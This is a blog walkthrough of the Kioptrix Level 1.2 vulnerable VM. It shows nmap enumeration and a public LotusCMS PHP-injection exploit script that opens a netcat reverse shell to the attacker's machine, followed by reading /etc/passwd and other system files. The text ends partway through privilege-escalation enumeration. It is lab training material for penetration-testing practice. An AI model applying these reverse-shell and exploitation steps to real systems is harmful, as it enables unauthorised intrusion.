index.html

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html" charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <script>
        // UNCOMMENT AND USE YOUR VARIABLES FOR DISQUS AND GOOGLE ANALYTICS
        // var d_id  = '',
        //     g_id  = 'UA-XXXXXXXX-X', // Format: UA-########-#, Example: UA-11220899-1
        //     g_url = 'XXXXXXX.XXX' // Format: #####.####, Example: webdesignporto.com
    </script>

    <title>Kioptrix: Level 1.2 (#3) Walkthrough</title>

    <meta name="HandheldFriendly" content="True" />
    <meta name="MobileOptimized" content="320" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <link rel="stylesheet" type="text/css" href="/assets/highlighter/prettify.css?v=2f125e8a2a" />
    <link rel="stylesheet" type="text/css" href="/assets/css/screen.css?v=2f125e8a2a" />

    <link rel="icon" href="/favicon.png" type="image/png" />
    <link rel="canonical" href="https://blog.rootshellz.com/kioptrix-walkthrough-3/" />
    <meta name="referrer" content="no-referrer-when-downgrade" />
    <link rel="amphtml" href="https://blog.rootshellz.com/kioptrix-walkthrough-3/amp/" />
    
    <meta property="og:site_name" content="rootshellz" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="Kioptrix: Level 1.2 (#3) Walkthrough" />
    <meta property="og:description" content="Intro Today I will be continuing on the the Kioptrix series of vulnerable VMs.  In previous posts, I covered Kioptrix1 and Kioptrix1.1.  Per the author of the challenge, &amp;quot;The same as the others, there’s more then one way to “pwn” this one. There’s easy and not" />
    <meta property="og:url" content="https://blog.rootshellz.com/kioptrix-walkthrough-3/" />
    <meta property="og:image" content="https://blog.rootshellz.com/content/images/2018/07/Kioptrix-3-Cover.jpeg" />
    <meta property="article:published_time" content="2017-09-12T04:49:33.000Z" />
    <meta property="article:modified_time" content="2018-07-30T08:07:38.000Z" />
    <meta property="article:tag" content="Boot2Root" />
    <meta property="article:tag" content="VulnHub" />
    <meta property="article:tag" content="OSCP" />
    <meta property="article:tag" content="Kioptrix" />
    
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:title" content="Kioptrix: Level 1.2 (#3) Walkthrough" />
    <meta name="twitter:description" content="Intro Today I will be continuing on the the Kioptrix series of vulnerable VMs.  In previous posts, I covered Kioptrix1 and Kioptrix1.1.  Per the author of the challenge, &amp;quot;The same as the others, there’s more then one way to “pwn” this one. There’s easy and not" />
    <meta name="twitter:url" content="https://blog.rootshellz.com/kioptrix-walkthrough-3/" />
    <meta name="twitter:image" content="https://blog.rootshellz.com/content/images/2018/07/Kioptrix-3-Cover.jpeg" />
    <meta name="twitter:label1" content="Written by" />
    <meta name="twitter:data1" content="rootshellz" />
    <meta name="twitter:label2" content="Filed under" />
    <meta name="twitter:data2" content="Boot2Root, VulnHub, OSCP, Kioptrix" />
    <meta name="twitter:site" content="@rootshellz" />
    <meta name="twitter:creator" content="@rootshellz" />
    <meta property="og:image:width" content="648" />
    <meta property="og:image:height" content="348" />
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "rootshellz",
        "url": "https://blog.rootshellz.com/",
        "logo": {
            "@type": "ImageObject",
            "url": "https://blog.rootshellz.com/content/images/2018/07/Blog-Logo.png"
        }
    },
    "author": {
        "@type": "Person",
        "name": "rootshellz",
        "image": {
            "@type": "ImageObject",
            "url": "https://blog.rootshellz.com/content/images/2018/07/rootshellz.jpg",
            "width": 1630,
            "height": 1631
        },
        "url": "https://blog.rootshellz.com/author/rootshellz/",
        "sameAs": [
            "https://twitter.com/rootshellz"
        ]
    },
    "headline": "Kioptrix: Level 1.2 (#3) Walkthrough",
    "url": "https://blog.rootshellz.com/kioptrix-walkthrough-3/",
    "datePublished": "2017-09-12T04:49:33.000Z",
    "dateModified": "2018-07-30T08:07:38.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "https://blog.rootshellz.com/content/images/2018/07/Kioptrix-3-Cover.jpeg",
        "width": 648,
        "height": 348
    },
    "keywords": "Boot2Root, VulnHub, OSCP, Kioptrix",
    "description": "Intro\nToday I will be continuing on the the Kioptrix series\n[http://www.kioptrix.com/blog/test-page/]  of vulnerable VMs. In previous posts,\nI covered Kioptrix1 [https://blog.rootshellz.com/kioptrix-walkthrough-1/]  and \nKioptrix1.1 [https://blog.rootshellz.com/kioptrix-walkthrough-2/].\n\nPer the author of the challenge, &quot;The same as the others, there’s more then one\nway to “pwn” this one. There’s easy and not so easy.&quot; So let&#x27;s see if we can\nfind both, shall we?\n\nSetup\nThe challenge description ",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "https://blog.rootshellz.com/"
    }
}
    </script>

    <meta name="generator" content="Ghost 3.36" />
    <link rel="alternate" type="application/rss+xml" title="rootshellz" href="https://blog.rootshellz.com/rss/" />
    <!-- https://www.jsdelivr.com/package/npm/prism-themes?path=themes -->
<!-- These three work together / are additive -->
<link href="https://cdn.jsdelivr.net/npm/prism-themes@1.5.0/themes/prism-synthwave84.css" rel="stylesheet" / >
<link href="https://cdn.jsdelivr.net/npm/prism-themes@1.5.0/themes/prism-vsc-dark-plus.css" rel="stylesheet" / >
<link href="https://cdn.jsdelivr.net/npm/prism-themes@1.5.0/themes/prism-xonokai.css" rel="stylesheet" / >


<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-TM0JKQZ7H1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-TM0JKQZ7H1');
</script>

    <script>
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
      (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
      m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

      ga('create', g_id, g_url);
      ga('send', 'pageview');

    </script>
</head>
<body class="post-template tag-boot2root tag-vulnhub tag-oscp tag-kioptrix">

    

<main class="content" role="main">

    <article class="post tag-boot2root tag-vulnhub tag-oscp tag-kioptrix">

        <header class="post-header">
            <a id="blog-logo" href="https://blog.rootshellz.com">
                    <img src="/content/images/2018/07/Blog-Logo.png" alt="Blog Logo" />
            </a>
        </header>


        <span class="post-meta"><time datetime="2017-09-11">11 Sep 2017</time> on <a href="/tag/boot2root/">Boot2Root</a> | <a href="/tag/vulnhub/">VulnHub</a> | <a href="/tag/oscp/">OSCP</a> | <a href="/tag/kioptrix/">Kioptrix</a></span>

        <h1 class="post-title">Kioptrix: Level 1.2 (#3) Walkthrough</h1>

        <section class="post-content">
            <!--kg-card-begin: markdown--><h1 id="intro">Intro</h1>
<p>Today I will be continuing on the the <a href="http://www.kioptrix.com/blog/test-page/">Kioptrix series</a> of vulnerable VMs.  In previous posts, I covered <a href="https://blog.rootshellz.com/kioptrix-walkthrough-1/">Kioptrix1</a> and <a href="https://blog.rootshellz.com/kioptrix-walkthrough-2/">Kioptrix1.1</a>.</p>
<p>Per the author of the challenge, &quot;The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy.&quot;  So let's see if we can find both, shall we?</p>
<h1 id="setup">Setup</h1>
<p>The challenge description and Readme file tells us that in addition to spinning up the VM and letting DHCP assign it an address, we also need to point <strong>kioptrix3.com</strong> to the VM's IP.  The Readme also confirms this is another web challenge, which makes sense given the required name mapping.  Let's spin up the VM, find it on the network, and then point the domain name via our Kali attack box's hosts file.</p>
<p>We use an nmap Ping scan of our local subnet to identify the target.</p>
<pre><code class="language-shell-output">root@kali:~# nmap -T4 -sn 172.16.2.0/24

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-08-30 23:01 PDT
Nmap scan report for 172.16.2.1
Host is up (0.00013s latency).
MAC Address: 00:50:56:C0:00:02 (VMware)
Nmap scan report for 172.16.2.132
Host is up (0.00015s latency).
MAC Address: 00:0C:29:0A:F9:22 (VMware)
Nmap scan report for 172.16.2.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:F5:96:F6 (VMware)
Nmap scan report for 172.16.2.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 12.86 seconds
</code></pre>
<p>Process of elimination of the know addresses means 172.16.2.132 is our target.</p>
<p>Per the Readme, let's point kioptrix3.com to 172.16.2.132:</p>
<pre><code class="language-shell-output">root@kali:~# echo &quot;172.16.2.132  kioptrix3.com&quot; &gt;&gt; /etc/hosts
</code></pre>
<h1 id="initialscanningandenumeration">Initial Scanning and Enumeration</h1>
<p>With out target identified and name resolution set up, let's move on to initial scanning of the VM.</p>
<p>TCP scanning:</p>
<pre><code class="language-shell-output">root@kali:~# nmap -T4 -Pn -sV -O -p- kioptrix3.com

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-08-30 23:08 PDT
Nmap scan report for kioptrix3.com (172.16.2.132)
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:0A:F9:22 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.10 seconds
</code></pre>
<p>UDP scanning:</p>
<pre><code class="language-shell-output">root@kali:~# nmap -T4 -Pn -sU --top-ports 200 -sV -O 172.16.2.132

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-08-30 23:09 PDT
Nmap scan report for kioptrix3.com (172.16.2.132)
Host is up (0.00044s latency).
All 200 scanned ports on kioptrix3.com (172.16.2.132) are closed (154) or open|filtered (46)
MAC Address: 00:0C:29:0A:F9:22 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 307.11 seconds
</code></pre>
<p>Not much to work with, but at least we know where to focus our effort.</p>
<p>Deeper Apache enumeration with relevant nmap scripts:</p>
<pre><code class="language-shell-output">root@kali:~# nmap -T4 -Pn -p 80 --script=http-apache-negotiation.nse,http-apache-server-status.nse,http-backup-finder.nse,http-coldfusion-subzero.nse,http-comments-displayer.nse,http-config-backup.nse,http-csrf.nse,http-default-accounts.nse,http-devframework.nse,http-dombased-xss.nse,http-drupal-enum.nse,http-drupal-enum-users.nse,http-enum.nse,http-git.nse,http-headers.nse,http-iis-short-name-brute.nse,http-iis-webdav-vuln.nse,http-mcmp.nse,http-methods.nse,http-method-tamper.nse,http-mobileversion-checker.nse,http-open-proxy.nse,http-open-redirect.nse,http-passwd.nse,http-phpmyadmin-dir-traversal.nse,http-phpself-xss.nse,http-php-version.nse,http-proxy-brute.nse,http-robots.txt.nse,http-shellshock.nse,http-sitemap-generator.nse,http-sql-injection.nse,http-stored-xss.nse,http-title.nse,http-unsafe-output-escaping.nse,http-userdir-enum.nse,http-vhosts.nse,http-vuln-cve2006-3392.nse,http-vuln-cve2009-3960.nse,http-vuln-cve2010-0738.nse,http-vuln-cve2010-2861.nse,http-vuln-cve2011-3192.nse,http-vuln-cve2011-3368.nse,http-vuln-cve2012-1823.nse,http-vuln-cve2013-0156.nse,http-vuln-cve2013-6786.nse,http-vuln-cve2013-7091.nse,http-vuln-cve2014-2126.nse,http-vuln-cve2014-2127.nse,http-vuln-cve2014-2128.nse,http-vuln-cve2014-2129.nse,http-vuln-cve2014-3704.nse,http-vuln-cve2014-8877.nse,http-vuln-cve2015-1427.nse,http-vuln-cve2015-1635.nse,http-waf-detect.nse,http-waf-fingerprint.nse,http-webdav-scan.nse,http-wordpress-enum.nse,http-wordpress-users.nse,http-xssed.nse,membase-http-info.nse,rmi-vuln-classloader.nse 172.16.2.132

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-08-30 23:20 PDT
Nmap scan report for kioptrix3.com (172.16.2.132)
Host is up (0.00034s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-comments-displayer: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=kioptrix3.com
|     
|     Path: http://kioptrix3.com/index.php?system=Admin
|     Line number: 12
|     Comment: 
|         &lt;!--
|           $(document).ready(function() {
|               // Handler for .ready() called.
|               $('body').corner();
|               $('#footer').corner();
|               $('#menu').corner(&quot;right&quot;);
|           });
|           --&gt;
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Line number: 72
|     Comment: 
|         &lt;!-- gallery_stats: outputs statistics for the photo gallery --&gt;
|     
|     Path: http://kioptrix3.com/index.php?system=Blog&amp;post=1281005380
|     Line number: 27
|     Comment: 
|         &lt;!-- BEGIN --&gt;
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Line number: 54
|     Comment: 
|         &lt;!-- links_end --&gt;
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Line number: 70
|     Comment: 
|         &lt;!-- popular_grid: output a 4x1 row containing the most viewed photos --&gt;
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Line number: 23
|     Comment: 
|         &lt;!-- menu: output the generic gallery navigation menu --&gt;
|     
|     Path: http://kioptrix3.com/index.php?system=Blog&amp;post=1281005380
|     Line number: 58
|     Comment: 
|         &lt;!--
|         var formAction = {
|           remember : function() {
|             if (document.getElementById(&quot;remember&quot;).checked) {
|               var expire = new Date();
|               expire.setTime(expire.getTime() + 30*24*60*60*1000);
|               var inputs = document.getElementById(&quot;commentForm&quot;).getElementsByTagName(&quot;input&quot;);
|               var name;
|               var website;
|               for (var i=0; i&lt;inputs.length; i++) {
|                 if (inputs[i].name==&quot;name&quot;) name = inputs[i].value;
|                 else if (inputs[i].name==&quot;website&quot;) website = inputs[i].value;
|               }
|               document.cookie = &quot;newsguest=&quot; + name + &quot;,&quot; + website + &quot;; expires=&quot; + expire.toGMTString();
|             }
|           },
|           fill : function() {
|             var cookie = document.cookie;
|             var newsguest = &quot;newsguest=&quot;;
|             var begin = cookie.indexOf(newsguest);
|             if (begin&gt;-1) {
|               begin += newsguest.length;
|               var end = cookie.indexOf(&quot;;&quot;, begin);
|               if (end==-1) end = cookie.length;
|               var guests = cookie.substring(begin, end).split(&quot;,&quot;);
|               var inputs = document.getElementById(&quot;commentForm&quot;).getElementsByTagName(&quot;input&quot;);
|               for (var i=0; i&lt;inputs.length; i++) {
|                 if (inputs[i].name==&quot;name&quot;) inputs[i].value = guests[0];
|                 else if (inputs[i].name==&quot;website&quot;) inputs[i].value = guests[1];
|               }
|             }
|           },
|           validate : function() {
|             var inputs = document.getElementById(&quot;commentForm&quot;).getElementsByTagName(&quot;input&quot;);
|             for (var i=0; i&lt;inputs.length; i++) {
|               if (inputs[i].name==&quot;name&quot; &amp;&amp; inputs[i].value=='') return false;
|             }
|             return (document.getElementById(&quot;commentForm&quot;).getElementsByTagName(&quot;textarea&quot;)[0].value!='');
|           },
|           submit : function() {
|             if (this.validate()) {
|               this.remember();
|               return true;
|             } else {
|               alert('No blank name or message, please.');
|               return false;
|             }
|           }
|         };
|         window.onload = formAction.fill;
|         //--&gt;
|     
|     Path: http://kioptrix3.com/index.php?system=Blog&amp;post=1281005380
|     Line number: 112
|     Comment: 
|         &lt;!-- Leaving in my name and website link will be greatly appreciated in return for offering you this template for free. Thanking you in advance. --&gt;
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Line number: 48
|     Comment: 
|         &lt;!--  &lt;a href=&quot;gadmin&quot;&gt;Admin&lt;/a&gt;&amp;nbsp;&amp;nbsp; --&gt;
|     
|     Path: http://kioptrix3.com/gallery/g.php/1
|     Line number: 47
|     Comment: 
|         &lt;!-- gallery_photo_grid: output 4x1 rows containing photos in this gallery --&gt;
|     
|     Path: http://kioptrix3.com/index.php?system=Blog&amp;post=1281005380
|     Line number: 108
|     Comment: 
|         
|         //--&gt;&lt;/script&gt;        &lt;/div&gt;
|     
|     Path: http://kioptrix3.com/gallery/themes/black/style.css
|     Line number: 1
|     Comment: 
|         /*  
|         Theme Name: Gallarific Black
|         Theme URI: http://www.gallarific.com/
|         Description: The Gallarific black photo gallery theme
|         Version: 1.0
|         Author: Gallarific
|         Author URI: http://www.gallarific.com/
|         */
|     
|     Path: http://kioptrix3.com/gallery/g.php/1
|     Line number: 47
|     Comment: 
|         &lt;!-- gallery_photo_grid_end --&gt;
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Line number: 101
|     Comment: 
|         &lt;!-- gallery_stats_end --&gt;
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Line number: 55
|     Comment: 
|         &lt;!-- recent_grid: output a 4x1 row containing recently uploaded photos --&gt;
|     
|     Path: http://kioptrix3.com/index.php?system=Blog&amp;post=1281005380
|     Line number: 29
|     Comment: 
|         &lt;!-- END --&gt;
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Line number: 38
|     Comment: 
|         &lt;!-- menu_end --&gt;
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Line number: 55
|     Comment: 
|         &lt;!-- recent_grid_end --&gt;
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Line number: 70
|     Comment: 
|         &lt;!-- popular_grid_end --&gt;
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Line number: 39
|     Comment: 
|_        &lt;!-- links: output quick links for gallery --&gt;
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=kioptrix3.com
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://kioptrix3.com/gallery/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://kioptrix3.com/index.php?system=Admin
|     Form id: contactform
|     Form action: index.php?system=Admin&amp;page=loginSubmit
|     
|     Path: http://kioptrix3.com/gallery/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://kioptrix3.com/gallery/gadmin/
|     Form id: username
|     Form action: index.php?task=signin
|     
|     Path: http://kioptrix3.com/gallery/index.php
|     Form id: 
|     Form action: login.php
|     
|     Path: http://kioptrix3.com/index.php?system=Blog&amp;post=1281005380#comments
|     Form id: commentform
|     Form action: 
|     
|     Path: http://kioptrix3.com/index.php?system=Blog&amp;post=1281005380
|     Form id: commentform
|_    Form action: 
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /phpmyadmin/: phpMyAdmin
|   /cache/: Potentially interesting folder
|   /core/: Potentially interesting folder
|   /icons/: Potentially interesting folder w/ directory listing
|   /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_  /style/: Potentially interesting folder
| http-headers: 
|   Date: Wed, 30 Aug 2017 23:20:14 GMT
|   Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|   X-Powered-By: PHP/5.2.4-2ubuntu5.6
|   Set-Cookie: PHPSESSID=c148ca51a0a449b611c4c46c62b9ddfe; path=/
|   Expires: Thu, 19 Nov 1981 08:52:00 GMT
|   Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
|   Pragma: no-cache
|   Connection: close
|   Content-Type: text/html
|   
|_  (Request type: HEAD)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-mobileversion-checker: No mobile version detected.
| http-php-version: Versions from logo query (less accurate): 5.1.3 - 5.1.6, 5.2.0 - 5.2.17
| Versions from credits query (more accurate): 5.2.3 - 5.2.5, 5.2.6RC3
|_Version from header x-powered-by: PHP/5.2.4-2ubuntu5.6
| http-sitemap-generator: 
|   Directory structure:
|     /
|       Other: 1; php: 1
|     /gallery/gadmin/
|       Other: 1
|     /gallery/photos/
|       jpg: 3
|     /gallery/themes/black/
|       css: 1; js: 1
|   Longest directory structure:
|     Depth: 3
|     Dir: /gallery/themes/black/
|   Total files found (by extension):
|_    Other: 2; css: 1; jpg: 3; js: 1; php: 1
| http-sql-injection: 
|   Possible sqli for queries:
|     http://kioptrix3.com/index.php?page=index%27%20OR%20sqlspider
|     http://kioptrix3.com/index.php?page=index%27%20OR%20sqlspider
|     http://kioptrix3.com/index.php?page=index%27%20OR%20sqlspider
|     http://kioptrix3.com/index.php?page=index%27%20OR%20sqlspider
|     http://kioptrix3.com/index.php?page=loginSubmit%27%20OR%20sqlspider&amp;system=Admin
|     http://kioptrix3.com/gallery/themes/black/slideshow.php?pause=%27%20OR%20sqlspider
|     http://kioptrix3.com/gallery/themes/black/%20%22slideshow.php?pause=%22%27%20OR%20sqlspider
|     http://kioptrix3.com/gallery/themes/black/path+%22gallery.php?id=%22%2bgallery_id%2b%22%27%20OR%20sqlspider&amp;sort=%22%2bfield%2b%22#photos&quot;;
|     http://kioptrix3.com/gallery/themes/black/path+%22gallery.php?id=%22%2bgallery_id%2b%22&amp;sort=%22%2bfield%2b%22%27%20OR%20sqlspider#photos&quot;;
|     http://kioptrix3.com/gallery/themes/black/tags.php?tag=%27%20OR%20sqlspider
|     http://kioptrix3.com/gallery/themes/black/%20%22slideshow.php?id=%22%27%20OR%20sqlspider
|     http://kioptrix3.com/gallery/themes/black/%20%22tags.php?sort=%22%2bfield%2b%22%27%20OR%20sqlspider&amp;tag=%22%2btag%2b%22#photos&quot;;
|     http://kioptrix3.com/gallery/themes/black/%20%22tags.php?sort=%22%2bfield%2b%22&amp;tag=%22%2btag%2b%22%27%20OR%20sqlspider#photos&quot;;
|     http://kioptrix3.com/gallery/themes/black/slideshow.php?id=%27%20OR%20sqlspider
|     http://kioptrix3.com/index.php?page=index%27%20OR%20sqlspider
|     http://kioptrix3.com/index.php?page=index%27%20OR%20sqlspider
|     http://kioptrix3.com/index.php?page=index%27%20OR%20sqlspider
|_    http://kioptrix3.com/index.php?page=index%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: Ligoat Security - Got Goat? Security ...
| http-vhosts: 
|_127 names had status 200
|_http-xssed: No previously reported XSS vuln.
MAC Address: 00:0C:29:0A:F9:22 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.70 seconds
</code></pre>
<p>So far, we have collected some software versions and some interesting spidered URLs to check out, including some URLs that may be vulnerable to SQL injection.</p>
<ul>
<li>Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)</li>
<li>PHP/5.2.4-2ubuntu5.6</li>
</ul>
<h1 id="webappfingerprinting">Web App Fingerprinting</h1>
<p>Let's manually map the application a bit via our browser and Burp.  We will simply proxy our browser through Burp with Intercept turned off.  This will allow us to quickly click around the web app and then inspect the requests and responses.</p>
<p>One of the first things we can see is the web application is running something called LotusCMS:<br>
<img src="https://blog.rootshellz.com/content/images/2017/09/Burp-LotusCMS-1.png" alt="Burp-LotusCMS-1"></p>
<p>I've never heard of LotusCMS, but let's see what <a href="https://www.exploit-db.com/">Exploit DB</a> can tell us about it:<br>
<img src="https://blog.rootshellz.com/content/images/2017/09/ExploitDB-LotusCMS.png" alt="ExploitDB-LotusCMS"></p>
<h1 id="rce">RCE</h1>
<p>RCE spotted (assuming the vulnerable version of the CMS)!  The ExploitDB page for the Metasploit module references <a href="https://secuniaresearch.flexerasoftware.com/secunia_research/2011-21/">https://secuniaresearch.flexerasoftware.com/secunia_research/2011-21/</a>, which is a decent summary of the issue.  The jist is that arbitrary PHP code execution is possible due to two separate issues in the CMS' code.  Both issues are caused by incorrectly implemented input sanitization with the input being passed to the PHP eval() statement.  This effectively provides system-level RCE by injecting PHP system() calls.</p>
<p>Let's see if we can find a stand-alone exploit script, instead of using Metasploit.<br>
<img src="https://blog.rootshellz.com/content/images/2017/09/Google-LotusCMS-RCE.png" alt="Google-LotusCMS-RCE"></p>
<p>The <a href="https://github.com/Hood3dRob1n/LotusCMS-Exploit">repo</a> contains both <a href="https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.sh">Bash</a> and <a href="https://github.com/Hood3dRob1n/LotusCMS-Exploit/blob/master/lotusRCE.rb">Ruby</a> stand-alone exploitation scripts.  Thanks <a href="https://github.com/Hood3dRob1n">Hood3dRob1n</a>!  Let's go for the Bash script...  After a quick review, we verify that the script is safe to run and understand its functionality.  When run, the script will check that we have a vulnerable target, ask us to select from a menu of payloads, and then run the exploit.  Interestingly, it appears Hood3dRob1n wrote this script with Kioptrix #3 (1.2) in mind.</p>
<h2 id="exploitingtherce">Exploiting the RCE</h2>
<p>We start our listener:</p>
<pre><code class="language-shell-output">root@kali:~# nc -vvlp 1337
listening on [any] 1337 ...
</code></pre>
<p>Then run the sploit:</p>
<pre><code class="language-shell-output">root@kali:~# ./lotusRCE.sh
USAGE: ./lotusRCE.sh target LotusCMS_path
EX: ./lotusRCE.sh 192.168.1.36 /lcms/
EX: ./lotusRCE.sh ki0ptrix3.com /
</code></pre>
<pre><code class="language-shell-output">root@kali:~# ./lotusRCE.sh kioptrix3.com /
Path found, now to check for vuln....

&lt;/html&gt;Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell....
what IP to use?
172.16.2.129
What PORT?
1337

OK, open your local listener and choose the method for back connect: 
1) NetCat -e      3) NetCat Backpipe  5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1
</code></pre>
<p>Flipping back to our listener:</p>
<pre><code class="language-shell-output">root@kali:~# nc -vvlp 1337
listening on [any] 1337 ...
connect to [172.16.2.129] from kioptrix3.com [172.16.2.132] 35306

hostname
Kioptrix3

whoami
www-data

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
</code></pre>
<p>Very nice, we now have a www-data user shell.  I'll admit, I don't know much about the Suhosin patch we detected, but I believe it is intended to protect PHP web apps against exploitation.  Maybe it was misconfigured on this app?  At any rate, let's go after root.</p>
<h1 id="localprivilegeescalation">Local Privilege Escalation</h1>
<h2 id="localenumeration">Local Enumeration</h2>
<p>I could accomplish this step using my Linux enumeration script, but let's have a go by hand.  If we can't find any low hanging fruit, we will fall back to the more thorough script.</p>
<p>We first need to see what we are working with:</p>
<pre><code class="language-shell-output">uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION=&quot;Ubuntu 8.04.3 LTS&quot;
</code></pre>
<p>From here, let's see what users we have on the system:</p>
<pre><code class="language-shell-output">cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

lastlog
Username         Port     From             Latest
root             tty1                      Mon Apr 18 11:29:13 -0400 2011
daemon                                     **Never logged in**
bin                                        **Never logged in**
sys                                        **Never logged in**
sync                                       **Never logged in**
games                                      **Never logged in**
man                                        **Never logged in**
lp                                         **Never logged in**
mail                                       **Never logged in**
news                                       **Never logged in**
uucp                                       **Never logged in**
proxy                                      **Never logged in**
www-data                                   **Never logged in**
backup                                     **Never logged in**
list                                       **Never logged in**
irc                                        **Never logged in**
gnats                                      **Never logged in**
libuuid                                    **Never logged in**
dhcp                                       **Never logged in**
syslog                                     **Never logged in**
klog                                       **Never logged in**
mysql                                      **Never logged in**
sshd                                       **Never logged in**
loneferret       pts/1    192.168.1.106    Sat Apr 16 08:51:58 -0400 2011
dreg                                       **Never logged in**
</code></pre>
<p>Besides root, it looks like loneferret is the only other user to have accessed the system.  Let's see what he has been up to:</p>
<pre><code class="language-shell-output">ls -la /home/loneferret
total 64
drwxr-xr-x 3 loneferret loneferret  4096 Apr 17  2011 .
drwxr-xr-x 5 root       root        4096 Apr 16  2011 ..
-rw-r--r-- 1 loneferret users         13 Apr 18  2011 .bash_history
-rw-r--r-- 1 loneferret loneferret   220 Apr 11  2011 .bash_logout
-rw-r--r-- 1 loneferret loneferret  2940 Apr 11  2011 .bashrc
-rw------- 1 root       root          15 Apr 15  2011 .nano_history
